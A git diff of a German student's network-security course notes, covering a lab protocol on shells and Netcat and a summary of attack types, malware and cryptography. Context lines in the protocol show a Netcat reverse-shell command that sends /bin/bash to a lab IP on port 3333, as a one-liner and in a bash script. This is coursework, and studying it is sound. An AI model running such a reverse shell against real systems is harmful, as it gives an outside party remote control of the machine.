diff --git a/content/nscs_protocol_10.md b/content/nscs_protocol_10.md index 7485163..8106078 100644 --- a/content/nscs_protocol_10.md +++ b/content/nscs_protocol_10.md @@ -2,16 +2,16 @@ # **Titel: Shells** -| **AufgabenNr:** | 9 | +| **AufgabenNr:** | 10 | |---|:---| | **Klasse:** | 3BHIF | | **Name:** | Benjamin Friedl | | **Gruppe:** | 2 | -| **Abgabetermin:** | 16.2.2024 | -| **Abgabedatum:** | 30.2.2024 | +| **Abgabetermin:** | 07.04.2024 | +| **Abgabedatum:** | 08.04.2024 | ## **Kurzbeschreibung:** -Übung 6 wiederholen und diesmal die VM des Hackers bearbeiten, damit sie die Paktete nicht blockt. +In diesem Protokoll wird auf die verschiedenen Shells und deren Funktionsweise eingegangen. Außerdem werden verschiedene Befehle und deren Verwendung erklärt. Abschließend wird auf das Tool Netcat eingegangen und dessen Verwendungsmöglichkeiten aufgezeigt. --- \ @@ -50,7 +50,7 @@ 1. [Chat-Tool](#chat-tool) 2. [File-Transfer-Tool](#file-transfer-tool) 3. [Shellzugriff](#shellzugriff) -\ + 4. [Netcat unter Windows](#netcat-unter-windows) \ \ \ @@ -248,4 +248,12 @@ nc 10.140.0.3 3333 -e /bin/bash ```bash #!/bin/bash nc 10.140.0.3 3333 -e /bin/bash -``` \ No newline at end of file +``` + +## Netcat unter Windows +- Netcat ist auch unter Windows verfügbar aber nicht standardmäßig installiert +- Download: https://eternallybored.org/misc/netcat/ +- Installation: `nc.exe` in `C:\Windows\System32` kopieren +- Es gibt auch eine GUI-Version von Netcat: https://sourceforge.net/projects/nc110/ +- GUI-Version ist einfacher zu bedienen, aber weniger flexibel +- GUI-Version kann auch für Port-Scanning, Port-Forwarding, etc. verwendet werden \ No newline at end of file diff --git a/content/nscs_protocol_10.pdf b/content/nscs_protocol_10.pdf new file mode 100644 index 0000000..389a26d Binary files /dev/null and b/content/nscs_protocol_10.pdf differ diff --git a/content/nscs_summary.md b/content/nscs_summary.md index 91a4ea5..fa6a64f 100644 --- a/content/nscs_summary.md +++ b/content/nscs_summary.md @@ -2,18 +2,37 @@ ## Table of Contents +- [Network Security](#network-security) + - [Network Security Terms](#network-security-terms) + - [Hacking Tools](#hacking-tools) + - [Attack Types](#attack-types) + - [Viren, Würmer, Trojaner, Ransomware](#viren-würmer-trojaner-ransomware) +- [Kryptographie](#kryptographie) + - [Ziele von Verschlüsselung](#ziele-von-verschlüsselung) + - [Symmetrische Verschlüsselung](#symmetrische-verschlüsselung) + - [Asymmetrische Verschlüsselung](#asymmetrische-verschlüsselung) + - [TLS/SSL](#tlsssl) + - [Funktionsweise](#funktionsweise) + - [Versionen](#versionen) + - [CA](#ca) + - [Hashfunktionen](#hashfunktionen) + - [Digital Signatures](#digital-signatures) +\ +\ +\ +--- # Network Security ## Network Security Terms -**Assets:**: alle Nutzer, Geräte u. Ressourcen eines Netzwerks -**Vulnerabilities:**: Schwachstellen, die von Angreifern ausgenutzt werden können -**Mitigation:**: Maßnahmen zur Reduzierung von Risiken -**Threats:**: Bedrohungen, die auf Assets einwirken -**Risk:**: Wahrscheinlichkeit, dass eine Bedrohung eintritt -**Exploit:**: Angriff, der eine Schwachstelle (Vulnerability) ausnutzt +- **Assets:**: alle Nutzer, Geräte u. Ressourcen eines Netzwerks +- **Vulnerabilities:**: Schwachstellen, die von Angreifern ausgenutzt werden können +- **Mitigation:**: Maßnahmen zur Reduzierung von Risiken +- **Threats:**: Bedrohungen, die auf Assets einwirken +- **Risk:**: Wahrscheinlichkeit, dass eine Bedrohung eintritt +- **Exploit:**: Angriff, der eine Schwachstelle (Vulnerability) ausnutzt ## Hacking Tools @@ -30,11 +49,19 @@ - **Compromised Key Attack**: Angreifer hat Zugriff auf Schlüssel - **Eavesdropping**: Abhören von Kommunikation (Sniffing) -## Viren, Würmer, Trojaner +## Viren, Würmer, Trojaner, Ransomware - **Virus**: Programm, das sich in andere Programme einbettet und sich selbst repliziert (z.B. durch E-Mail-Anhänge) + - **Bootsektorvirus**: infiziert den Bootsektor einer Festplatte + - **Dateivirus**: infiziert Dateien + - **Makrovirus**: infiziert Makros in Dokumenten + - **Scriptvirus**: infiziert Skripte (z.B. JavaScript) - **Wurm**: Programm, das sich selbstständig verbreitet (z.B. über Netzwerke) - **Trojaner**: Programm, das sich als nützlich tarnt, aber Schadcode enthält (z.B. als legitime Software getarnt) +- **Ransomware**: Schadsoftware, die Dateien verschlüsselt und Lösegeld fordert + - **Crypto-Ransomware**: verschlüsselt Dateien + - **Locker-Ransomware**: sperrt den Zugriff auf das System +--- # Kryptographie ## Ziele von Verschlüsselung - **Vertraulichkeit**: Schutz vor unbefugtem Zugriff @@ -85,9 +112,13 @@ Beispiele: VeriSign, Thawte, Comodo - **Einwegfunktionen** - **Beispiel**: MD5, SHA-1, SHA-256 - **Verwendung**: Integritätsprüfung, Passwort-Hashing +- **Kollisionsresistenz**: zwei unterschiedliche Eingaben erzeugen unterschiedliche Hashwerte +- **Beispiel**: SHA-256 (256 Bit Hashwert) ## Digital Signatures - **Signatur mit privatem Schlüssel** - **Verifikation mit öffentlichem Schlüssel** - **Authentifizierung und Integritätsschutz** +- **Beispiel**: RSA, DSA +--- \ No newline at end of file